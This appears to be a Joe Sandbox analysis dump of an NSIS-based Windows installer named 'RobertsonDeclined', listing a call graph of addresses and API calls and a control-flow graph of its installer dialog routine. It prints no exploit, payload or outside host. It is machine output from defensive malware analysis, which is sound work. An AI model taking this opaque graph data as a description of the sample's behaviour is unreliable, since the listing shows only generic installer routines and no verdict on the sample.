40139d 80 API calls 3637->3638 3639 401432 3638->3639 3639->3423 3647 406045 3640->3647 3641 4060c1 CharPrevW 3645 4060bb 3641->3645 3642 4060ae CharNextW 3642->3645 3642->3647 3643 4060e1 3643->3476 3644 405d06 CharNextW 3644->3647 3645->3641 3645->3643 3646 40609a CharNextW 3646->3647 3647->3642 3647->3644 3647->3645 3647->3646 3648 4060a9 CharNextW 3647->3648 3648->3642 3650 4037ea CreateDirectoryW 3649->3650 3651 40673f lstrcatW 3649->3651 3652 405e7f 3650->3652 3651->3650 3653 405e8c GetTickCount GetTempFileNameW 3652->3653 3654 405ec2 3653->3654 3655 4037fe 3653->3655 3654->3653 3654->3655 3655->3402 3656->3483 3657->3485 3659 406760 3658->3659 3660 4035f3 3659->3660 3661 406766 CharPrevW 3659->3661 3662 406009 lstrcpynW 3660->3662 3661->3659 3661->3660 3662->3489 3664 403357 3663->3664 3664->3502 3666 4032f3 3665->3666 3667 4032db 3665->3667 3670 403303 GetTickCount 3666->3670 3671 4032fb 3666->3671 3668 4032e4 DestroyWindow 3667->3668 3669 4032eb 3667->3669 3668->3669 3669->3492 3673 403311 CreateDialogParamW ShowWindow 3670->3673 3674 403334 3670->3674 3700 406332 3671->3700 3673->3674 3674->3492 3676->3500 3679 403398 3677->3679 3678 4033c3 3681 403336 ReadFile 3678->3681 3679->3678 3722 403368 SetFilePointer 3679->3722 3682 4033ce 3681->3682 3683 4033e7 GetTickCount 3682->3683 3684 403518 3682->3684 3686 4033d2 3682->3686 3696 4033fa 3683->3696 3685 40351c 3684->3685 3690 403540 3684->3690 3687 403336 ReadFile 3685->3687 3686->3507 3687->3686 3688 403336 ReadFile 3688->3690 3689 403336 ReadFile 3689->3696 3690->3686 3690->3688 3691 40355f WriteFile 3690->3691 3691->3686 3692 403574 3691->3692 3692->3686 3692->3690 3694 40345c GetTickCount 3694->3696 3695 403485 MulDiv wsprintfW 3711 404f72 3695->3711 3696->3686 3696->3689 3696->3694 3696->3695 3698 4034c9 WriteFile 3696->3698 3704 407312 3696->3704 3698->3686 3698->3696 3699->3498 3701 40634f PeekMessageW 3700->3701 3702 406345 DispatchMessageW 3701->3702 3703 403301 3701->3703 3702->3701 3703->3492 3705 407332 3704->3705 3706 40733a 3704->3706 3705->3696 3706->3705 3707 4073c2 GlobalFree 3706->3707 3708 4073cb GlobalAlloc 3706->3708 3709 407443 GlobalAlloc 3706->3709 3710 40743a GlobalFree 3706->3710 3707->3708 3708->3705 3708->3706 3709->3705 3709->3706 3710->3709 3712 404f8b 3711->3712 3717 40502f 3711->3717 3713 404fa9 lstrlenW 3712->3713 3714 406805 18 API calls 3712->3714 3715 404fd2 3713->3715 3716 404fb7 lstrlenW 3713->3716 3714->3713 3719 404fe5 3715->3719 3720 404fd8 SetWindowTextW 3715->3720 3716->3717 3718 404fc9 lstrcatW 3716->3718 3717->3696 3718->3715 3719->3717 3721 404feb SendMessageW SendMessageW SendMessageW 3719->3721 3720->3719 3721->3717 3722->3678 3724 403ea9 3723->3724 3752 405f51 wsprintfW 3724->3752 3726 403f1d 3727 406805 18 API calls 3726->3727 3728 403f29 SetWindowTextW 3727->3728 3729 403f44 3728->3729 3730 403f5f 3729->3730 3731 406805 18 API calls 3729->3731 3730->3522 3731->3729 3753 403daf 3732->3753 3734 40506a 3737 4062a3 11 API calls 3734->3737 3739 405095 3734->3739 3756 40139d 3734->3756 3735 403daf SendMessageW 3736 4050a5 OleUninitialize 3735->3736 3736->3559 3737->3734 3739->3735 3740->3519 3742 405f07 RegQueryValueExW 3741->3742 3743 405989 3741->3743 3744 405f29 RegCloseKey 3742->3744 3743->3517 3743->3518 3744->3743 3746->3524 3891 406009 lstrcpynW 3747->3891 3749 403e88 3750 406722 3 API calls 3749->3750 3751 403e8e lstrcatW 3750->3751 3751->3542 3752->3726 3754 403dc7 3753->3754 3755 403db8 SendMessageW 3753->3755 3754->3734 3755->3754 3759 4013a4 3756->3759 3757 401410 3757->3734 3759->3757 3760 4013dd MulDiv SendMessageW 3759->3760 3761 4015a0 3759->3761 3760->3759 3762 4015fa 3761->3762 3840 40160c 3761->3840 3763 401601 3762->3763 3764 401742 3762->3764 3765 401962 3762->3765 3766 4019ca 3762->3766 3767 40176e 3762->3767 3768 4017b1 3762->3768 3769 401672 3762->3769 3770 401693 3762->3770 3771 401616 3762->3771 3772 401897 3762->3772 3773 4018db 3762->3773 3774 40163c 3762->3774 3775 4016bd 3762->3775 3784 4016d6 3762->3784 3786 401736 3762->3786 3789 401650 3762->3789 3762->3840 3779 4062a3 11 API calls 3763->3779 3787 401751 ShowWindow 3764->3787 3788 401758 3764->3788 3776 40145c 18 API calls 3765->3776 3783 40145c 18 API calls 3766->3783 3790 40145c 18 API calls 3767->3790 3874 40145c 3768->3874 3791 40145c 18 API calls 3769->3791 3868 401446 3770->3868 3782 40145c 18 API calls 3771->3782 3792 40145c 18 API calls 3772->3792 3780 40145c 18 API calls 3773->3780 3785 401647 PostQuitMessage 3774->3785 3774->3840 3781 4062a3 11 API calls 3775->3781 3794 401968 GetFullPathNameW 3776->3794 3779->3840 3797 4018e2 3780->3797 3798 4016c7 SetForegroundWindow 3781->3798 3799 40161c 3782->3799 3800 4019d1 SearchPathW 3783->3800 3801 401446 18 API calls 3784->3801 3784->3840 3785->3840 3786->3840 3890 405f51 wsprintfW 3786->3890 3787->3788 3802 401765 ShowWindow 3788->3802 3788->3840 3813 4062a3 11 API calls 3789->3813 3803 401775 3790->3803 3804 401678 3791->3804 3793 40189d 3792->3793 3886 4062d5 FindFirstFileW 3793->3886 3806 4019a1 3794->3806 3807 40197f 3794->3807 3796 40169a 3871 4062a3 lstrlenW wvsprintfW 3796->3871 3811 40145c 18 API calls 3797->3811 3798->3840 3812 4062a3 11 API calls 3799->3812 3800->3840 3801->3840 3802->3840 3814 4062a3 11 API calls 3803->3814 3815 4062a3 11 API calls 3804->3815 3828 4019b8 GetShortPathNameW 3806->3828 3806->3840 3807->3806 3835 4062d5 2 API calls 3807->3835 3808 4062a3 11 API calls 3818 4017c9 3808->3818 3820 4018eb 3811->3820 3821 401627 3812->3821 3822 401664 3813->3822 3823 401785 SetFileAttributesW 3814->3823 3816 401683 3815->3816 3833 404f72 25 API calls 3816->3833 3879 405d59 CharNextW CharNextW 3818->3879 3829 40145c 18 API calls 3820->3829 3830 404f72 25 API calls 3821->3830 3831 40139d 65 API calls 3822->3831 3832 40179a 3823->3832 3823->3840 3824 4018c2 3836 4062a3 11 API calls 3824->3836 3825 4018a9 3834 4062a3 11 API calls 3825->3834 3828->3840 3837 4018f5 3829->3837 3830->3840 3831->3840 3838 4062a3 11 API calls 3832->3838 3833->3840 3834->3840 3839 401991 3835->3839 3836->3840 3842 4062a3 11 API calls 3837->3842 3838->3840 3839->3806 3889 406009 lstrcpynW 3839->3889 3840->3759 3841 401864 3841->3816 3845 40186e 3841->3845 3844 401902 MoveFileW 3842->3844 3843 405d06 CharNextW 3847 4017e6 CreateDirectoryW 3843->3847 3848 401912 3844->3848 3849 40191e 3844->3849 3850 404f72 25 API calls 3845->3850 3851 4017fe GetLastError 3847->3851 3861 4017d4 3847->3861 3848->3816 3855 4062d5 2 API calls 3849->3855 3867 401942 3849->3867 3852 401875 3850->3852 3853 401827 GetFileAttributesW 3851->3853 3854 40180b GetLastError 3851->3854 3885 406009 lstrcpynW 3852->3885 3853->3861 3857 4062a3 11 API calls 3854->3857 3858 401929 3855->3858 3857->3861 3864 406c68 42 API calls 3858->3864 3858->3867 3859 401882 SetCurrentDirectoryW 3859->3840 3860 4062a3 11 API calls 3863 40195c 3860->3863 3861->3841 3861->3843 3862 4062a3 11 API calls 3861->3862 3862->3861 3863->3840 3865 401936 3864->3865 3866 404f72 25 API calls 3865->3866 3866->3867 3867->3860 3869 406805 18 API calls 3868->3869 3870 401455 3869->3870 3870->3796 3872 4060e7 9 API calls 3871->3872 3873 4016a7 Sleep 3872->3873 3873->3840 3875 406805 18 API calls 3874->3875 3876 401488 3875->3876 3877 401497 3876->3877 3878 406038 5 API calls 3876->3878 3877->3808 3878->3877 3880 405d76 3879->3880 3883 405d88 3879->3883 3882 405d83 CharNextW 3880->3882 3880->3883 3881 405dac 3881->3861 3882->3881 3883->3881 3884 405d06 CharNextW 3883->3884 3884->3883 3885->3859 3887 4018a5 3886->3887 3888 4062eb FindClose 3886->3888 3887->3824 3887->3825 3888->3887 3889->3806 3890->3840 3891->3749 3893 403c91 3892->3893 3894 403c96 FreeLibrary GlobalFree 3893->3894 3895 403876 3893->3895 3894->3894 3894->3895 3896 406c9b 3895->3896 3897 40677e 18 API calls 3896->3897 3898 406cae 3897->3898 3899 406cb7 DeleteFileW 3898->3899 3900 406cce 3898->3900 3941 403882 CoUninitialize 3899->3941 3901 406e4b 3900->3901 3944 406009 lstrcpynW 3900->3944 3904 406e58 3901->3904 3908 4062d5 2 API calls 3901->3908 3901->3941 3903 406cf9 3905 406d03 lstrcatW 3903->3905 3906 406d0d 3903->3906 3913 4062a3 11 API calls 3904->3913 3907 406d13 3905->3907 3909 406751 2 API calls 3906->3909 3911 406d23 lstrcatW 3907->3911 3912 406d19 3907->3912 3910 406e64 3908->3910 3909->3907 3915 406722 3 API calls 3910->3915 3910->3941 3914 406d2b lstrlenW FindFirstFileW 3911->3914 3912->3911 3912->3914 3913->3941 3916 406e3b 3914->3916 3930 406d52 3914->3930 3918 406e6e 3915->3918 3916->3901 3917 405d06 CharNextW 3917->3930 3919 4062a3 11 API calls 3918->3919 3920 406e79 3919->3920 3921 405e30 2 API calls 3920->3921 3922 406e81 RemoveDirectoryW 3921->3922 3926 406ec4 3922->3926 3927 406e8d 3922->3927 3923 406e18 FindNextFileW 3925 406e30 FindClose 3923->3925 3923->3930 3925->3916 3928 404f72 25 API calls 3926->3928 3927->3904 3929 406e93 3927->3929 3928->3941 3932 4062a3 11 API calls 3929->3932 3930->3917 3930->3923 3931 4062a3 11 API calls 3930->3931 3934 406c9b 72 API calls 3930->3934 3940 404f72 25 API calls 3930->3940 3942 404f72 25 API calls 3930->3942 3943 406c68 42 API calls 3930->3943 3945 406009 lstrcpynW 3930->3945 3946 405e30 GetFileAttributesW 3930->3946 3931->3930 3933 406e9d 3932->3933 3936 404f72 25 API calls 3933->3936 3934->3930 3938 406ea7 3936->3938 3939 406c68 42 API calls 3938->3939 3939->3941 3940->3923 3941->3417 3941->3418 3942->3930 3943->3930 3944->3903 3945->3930 3947 405e4d DeleteFileW 3946->3947 3948 405e3f SetFileAttributesW 3946->3948 3947->3930 3948->3947 3949->3580 3950->3604 3951->3612 3952->3612 3953->3613 3955 406ae7 GetShortPathNameW 3954->3955 3956 406abe 3954->3956 3958 406b00 3955->3958 3959 406c62 3955->3959 3980 405e50 GetFileAttributesW CreateFileW 3956->3980 3958->3959 3961 406b08 WideCharToMultiByte 3958->3961 3959->3633 3960 406ac7 CloseHandle GetShortPathNameW 3960->3959 3962 406adf 3960->3962 3961->3959 3963 406b25 WideCharToMultiByte 3961->3963 3962->3955 3962->3959 3963->3959 3964 406b3d wsprintfA 3963->3964 3965 406805 18 API calls 3964->3965 3966 406b69 3965->3966 3981 405e50 GetFileAttributesW CreateFileW 3966->3981 3968 406b76 3968->3959 3969 406b83 GetFileSize GlobalAlloc 3968->3969 3970 406ba4 ReadFile 3969->3970 3971 406c58 CloseHandle 3969->3971 3970->3971 3972 406bbe 3970->3972 3971->3959 3972->3971 3982 405db6 lstrlenA 3972->3982 3975 406bd7 lstrcpyA 3978 406bf9 3975->3978 3976 406beb 3977 405db6 4 API calls 3976->3977 3977->3978 3979 406c30 SetFilePointer WriteFile GlobalFree 3978->3979 3979->3971 3980->3960 3981->3968 3983 405df7 lstrlenA 3982->3983 3984 405dd0 lstrcmpiA 3983->3984 3985 405dff 3983->3985 3984->3985 3986 405dee CharNextA 3984->3986 3985->3975 3985->3976 3986->3983 4851 402a84 4852 401553 19 API calls 4851->4852 4853 402a8e 4852->4853 4854 401446 18 API calls 4853->4854 4855 402a98 4854->4855 4856 401a13 4855->4856 4857 402ab2 RegEnumKeyW 4855->4857 4858 402abe RegEnumValueW 4855->4858 4859 402a7e 4857->4859 4858->4856 4858->4859 4859->4856 4860 4029e4 RegCloseKey 4859->4860 4860->4856 4861 402c8a 4862 402ca2 4861->4862 4863 402c8f 4861->4863 4865 40145c 18 API calls 4862->4865 4864 401446 18 API calls 4863->4864 4867 402c97 4864->4867 4866 402ca9 lstrlenW 4865->4866 4866->4867 4868 402ccb WriteFile 4867->4868 4869 401a13 4867->4869 4868->4869 4870 40400d 4871 40401a lstrcpynA lstrlenA 4870->4871 4872 40406a 4870->4872 4871->4872 4873 40404b 4871->4873 4873->4872 4874 404057 GlobalFree 4873->4874 4874->4872 4875 401d8e 4876 40145c 18 API calls 4875->4876 4877 401d95 ExpandEnvironmentStringsW 4876->4877 4878 401da8 4877->4878 4880 401db9 4877->4880 4879 401dad lstrcmpW 4878->4879 4878->4880 4879->4880 4881 401e0f 4882 401446 18 API calls 4881->4882 4883 401e17 4882->4883 4884 401446 18 API calls 4883->4884 4885 401e21 4884->4885 4886 4030e3 4885->4886 4888 405f51 wsprintfW 4885->4888 4888->4886 4889 402392 4890 40145c 18 API calls 4889->4890 4891 402399 4890->4891 4894 4071f8 4891->4894 4895 406ed2 25 API calls 4894->4895 4896 407218 4895->4896 4897 407222 lstrcpynW lstrcmpW 4896->4897 4898 4023a7 4896->4898 4899 407254 4897->4899 4900 40725a lstrcpynW 4897->4900 4899->4900 4900->4898 3987 402713 4002 406009 lstrcpynW 3987->4002 3989 40272c 4003 406009 lstrcpynW 3989->4003 3991 402738 3992 402743 3991->3992 3993 40145c 18 API calls 3991->3993 3994 402752 3992->3994 3995 40145c 18 API calls 3992->3995 3993->3992 3996 40145c 18 API calls 3994->3996 3998 402761 3994->3998 3995->3994 3996->3998 3997 40145c 18 API calls 3999 40276b 3997->3999 3998->3997 4000 4062a3 11 API calls 3999->4000 4001 40277f WritePrivateProfileStringW 4000->4001 4002->3989 4003->3991 4901 402797 4902 40145c 18 API calls 4901->4902 4903 4027ae 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4027b7 4904->4905 4906 40145c 18 API calls 4905->4906 4907 4027c0 GetPrivateProfileStringW lstrcmpW 4906->4907 4908 402e18 4909 40145c 18 API calls 4908->4909 4910 402e1f FindFirstFileW 4909->4910 4911 402e32 4910->4911 4916 405f51 wsprintfW 4911->4916 4913 402e43 4917 406009 lstrcpynW 4913->4917 4915 402e50 4916->4913 4917->4915 4918 401e9a 4919 40145c 18 API calls 4918->4919 4920 401ea1 4919->4920 4921 401446 18 API calls 4920->4921 4922 401eab wsprintfW 4921->4922 4209 401a1f 4210 40145c 18 API calls 4209->4210 4211 401a26 4210->4211 4212 4062a3 11 API calls 4211->4212 4213 401a49 4212->4213 4214 401a64 4213->4214 4215 401a5c 4213->4215 4263 406009 lstrcpynW 4214->4263 4262 406009 lstrcpynW 4215->4262 4218 401a62 4222 406038 5 API calls 4218->4222 4219 401a6f 4220 406722 3 API calls 4219->4220 4221 401a75 lstrcatW 4220->4221 4221->4218 4244 401a81 4222->4244 4223 4062d5 2 API calls 4223->4244 4224 405e30 2 API calls 4224->4244 4226 401a98 CompareFileTime 4226->4244 4227 401ba9 4228 404f72 25 API calls 4227->4228 4230 401bb3 4228->4230 4229 404f72 25 API calls 4231 401b70 4229->4231 4232 40337f 37 API calls 4230->4232 4235 4062a3 11 API calls 4231->4235 4233 401bc6 4232->4233 4236 4062a3 11 API calls 4233->4236 4234 406009 lstrcpynW 4234->4244 4259 401b8b 4235->4259 4237 401bda 4236->4237 4238 401be9 SetFileTime 4237->4238 4239 401bf8 CloseHandle 4237->4239 4238->4239 4241 401c09 4239->4241 4239->4259 4240 406805 18 API calls 4240->4244 4242 401c21 4241->4242 4243 401c0e 4241->4243 4246 406805 18 API calls 4242->4246 4245 406805 18 API calls 4243->4245 4244->4223 4244->4224 4244->4226 4244->4227 4244->4234 4244->4240 4247 405ca0 MessageBoxIndirectW 4244->4247 4251 401b50 4244->4251 4253 4062a3 11 API calls 4244->4253 4260 401b5d 4244->4260 4261 405e50 GetFileAttributesW CreateFileW 4244->4261 4248 401c16 lstrcatW 4245->4248 4249 401c29 4246->4249 4247->4244 4248->4249 4250 4062a3 11 API calls 4249->4250 4252 401c34 4250->4252 4254 401b93 4251->4254 4255 401b53 4251->4255 4256 405ca0 MessageBoxIndirectW 4252->4256 4253->4244 4257 4062a3 11 API calls 4254->4257 4258 4062a3 11 API calls 4255->4258 4256->4259 4257->4259 4258->4260 4260->4229 4261->4244 4262->4218 4263->4219 4923 40209f GetDlgItem GetClientRect 4924 40145c 18 API calls 4923->4924 4925 4020cf LoadImageW SendMessageW 4924->4925 4926 4030e3 4925->4926 4927 4020ed DeleteObject 4925->4927 4927->4926 4928 402b9f 4929 401446 18 API calls 4928->4929 4932 402ba7 4929->4932 4930 401446 18 API calls 4939 402c3d 4930->4939 4931 402bdf ReadFile 4931->4932 4931->4939 4932->4931 4933 402c06 MultiByteToWideChar 4932->4933 4934 402c3f 4932->4934 4935 402c4f 4932->4935 4932->4939 4940 402c4a 4932->4940 4933->4932 4933->4935 4941 405f51 wsprintfW 4934->4941 4937 402c6b SetFilePointer 4935->4937 4935->4939 4937->4939 4938 402d17 ReadFile 4938->4939 4939->4930 4939->4938 4939->4940 4941->4940 4942 402b23 GlobalAlloc 4943 402b39 4942->4943 4944 402b4b 4942->4944 4945 401446 18 API calls 4943->4945 4946 40145c 18 API calls 4944->4946 4948 402b41 4945->4948 4947 402b52 WideCharToMultiByte lstrlenA 4946->4947 4947->4948 4949 402b84 WriteFile 4948->4949 4951 402b93 4948->4951 4950 402384 GlobalFree 4949->4950 4949->4951 4950->4951 4953 4044a5 4954 404512 4953->4954 4955 4044df 4953->4955 4956 40451f GetDlgItem GetAsyncKeyState 4954->4956 4964 4045b1 4954->4964 5021 405c84 GetDlgItemTextW 4955->5021 4958 40453e GetDlgItem 4956->4958 4972 40455c 4956->4972 4961 403d3f 19 API calls 4958->4961 4959 40469d 4963 404833 4959->4963 5023 405c84 GetDlgItemTextW 4959->5023 4960 4044ea 4962 406038 5 API calls 4960->4962 4967 404551 ShowWindow 4961->4967 4965 4044f0 4962->4965 4971 403dca 8 API calls 4963->4971 4964->4959 4964->4963 4970 406805 18 API calls 4964->4970 4968 403e74 5 API calls 4965->4968 4967->4972 4973 4044f5 GetDlgItem 4968->4973 4969 4046c9 4974 40677e 18 API calls 4969->4974 4975 40462f SHBrowseForFolderW 4970->4975 4976 404847 4971->4976 4977 404579 SetWindowTextW 4972->4977 4982 405d59 4 API calls 4972->4982 4973->4963 4978 404503 IsDlgButtonChecked 4973->4978 4980 4046cf 4974->4980 4975->4959 4981 404647 CoTaskMemFree 4975->4981 4979 403d3f 19 API calls 4977->4979 4978->4954 4983 404597 4979->4983 5024 406009 lstrcpynW 4980->5024 4984 406722 3 API calls 4981->4984 4985 40456f 4982->4985 4986 403d3f 19 API calls 4983->4986 4987 404654 4984->4987 4985->4977 4989 406722 3 API calls 4985->4989 4990 4045a2 4986->4990 4991 40468b SetDlgItemTextW 4987->4991 4996 406805 18 API calls 4987->4996 4989->4977 5022 403d98 SendMessageW 4990->5022 4991->4959 4992 4046e6 4994 4062fc 3 API calls 4992->4994 5004 4046ee 4994->5004 4995 4045aa 4997 4062fc 3 API calls 4995->4997 4998 404673 lstrcmpiW 4996->4998 4997->4964 4998->4991 5001 404684 lstrcatW 4998->5001 4999 404730 5025 406009 lstrcpynW 4999->5025 5001->4991 5002 404739 5003 405d59 4 API calls 5002->5003 5005 40473f GetDiskFreeSpaceW 5003->5005 5004->4999 5007 406751 2 API calls 5004->5007 5009 404785 5004->5009 5008 404763 MulDiv 5005->5008 5005->5009 5007->5004 5008->5009 5010 4047e2 5009->5010 5011 4043ad 21 API calls 5009->5011 5012 404805 5010->5012 5013 40141d 80 API calls 5010->5013 5014 4047d3 5011->5014 5026 403d85 KiUserCallbackDispatcher 5012->5026 5013->5012 5016 4047e4 SetDlgItemTextW 5014->5016 5017 4047d8 5014->5017 5016->5010 5019 4043ad 21 API calls 5017->5019 5018 404821 5018->4963 5027 403d61 5018->5027 5019->5010 5021->4960 5022->4995 5023->4969 5024->4992 5025->5002 5026->5018 5028 403d74 SendMessageW 5027->5028 5029 403d6f 5027->5029 5028->4963 5029->5028 5030 402da5 5031 402dac 5030->5031 5033 4030e3 5030->5033 5032 401446 18 API calls 5031->5032 5034 402db8 5032->5034 5035 402dbf SetFilePointer 5034->5035 5035->5033 5036 402dcf 5035->5036 5036->5033 5038 405f51 wsprintfW 5036->5038 5038->5033 5039 401cb2 5040 40145c 18 API calls 5039->5040 5041 401c54 5040->5041 5042 4062a3 11 API calls 5041->5042 5043 401c64 5041->5043 5044 401c59 5042->5044 5045 406c9b 81 API calls 5044->5045 5045->5043 4014 4021b5 4015 40145c 18 API calls 4014->4015 4016 4021bb 4015->4016 4017 40145c 18 API calls 4016->4017 4018 4021c4 4017->4018 4019 40145c 18 API calls 4018->4019 4020 4021cd 4019->4020 4021 40145c 18 API calls 4020->4021 4022 4021d6 4021->4022 4023 404f72 25 API calls 4022->4023 4024 4021e2 ShellExecuteW 4023->4024 4025 40220d 4024->4025 4028 40221b 4024->4028 4026 4062a3 11 API calls 4025->4026 4026->4028 4027 4062a3 11 API calls 4029 402230 4027->4029 4028->4027 5053 402238 5054 40145c 18 API calls 5053->5054 5055 40223e 5054->5055 5056 4062a3 11 API calls 5055->5056 5057 40224b 5056->5057 5058 404f72 25 API calls 5057->5058 5059 402255 5058->5059 5060 405c3f 2 API calls 5059->5060 5061 40225b 5060->5061 5062 4022ac CloseHandle 5061->5062 5063 4062a3 11 API calls 5061->5063 5067 4030e3 5062->5067 5065 40226d 5063->5065 5065->5062 5066 402283 WaitForSingleObject 5065->5066 5069 406332 2 API calls 5065->5069 5066->5065 5068 402291 GetExitCodeProcess 5066->5068 5068->5062 5070 4022a3 5068->5070 5069->5066 5072 405f51 wsprintfW 5070->5072 5072->5062 4123 401eb9 4124 401f24 4123->4124 4125 401ec6 4123->4125 4126 401f53 GlobalAlloc 4124->4126 4127 401f28 4124->4127 4128 401ed5 4125->4128 4134 401ef7 4125->4134 4129 406805 18 API calls 4126->4129 4130 401f36 4127->4130 4133 4062a3 11 API calls 4127->4133 4131 4062a3 11 API calls 4128->4131 4132 401f46 4129->4132 4147 406009 lstrcpynW 4130->4147 4142 401ee2 4131->4142 4136 402387 GlobalFree 4132->4136 4144 402708 4132->4144 4133->4130 4145 406009 lstrcpynW 4134->4145 4136->4144 4138 401f06 4146 406009 lstrcpynW 4138->4146 4139 406805 18 API calls 4139->4142 4141 401f15 4148 406009 lstrcpynW 4141->4148 4142->4139 4142->4144 4145->4138 4146->4141 4147->4132 4148->4144 5073 4074bb 5074 407344 5073->5074 5075 407c6d 5074->5075 5076 4073c2 GlobalFree 5074->5076 5077 4073cb GlobalAlloc 5074->5077 5078 407443 GlobalAlloc 5074->5078 5079 40743a GlobalFree 5074->5079 5076->5077 5077->5074 5077->5075 5078->5074 5078->5075 5079->5078

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                                                    • API String ID: 2110491804-2409696222
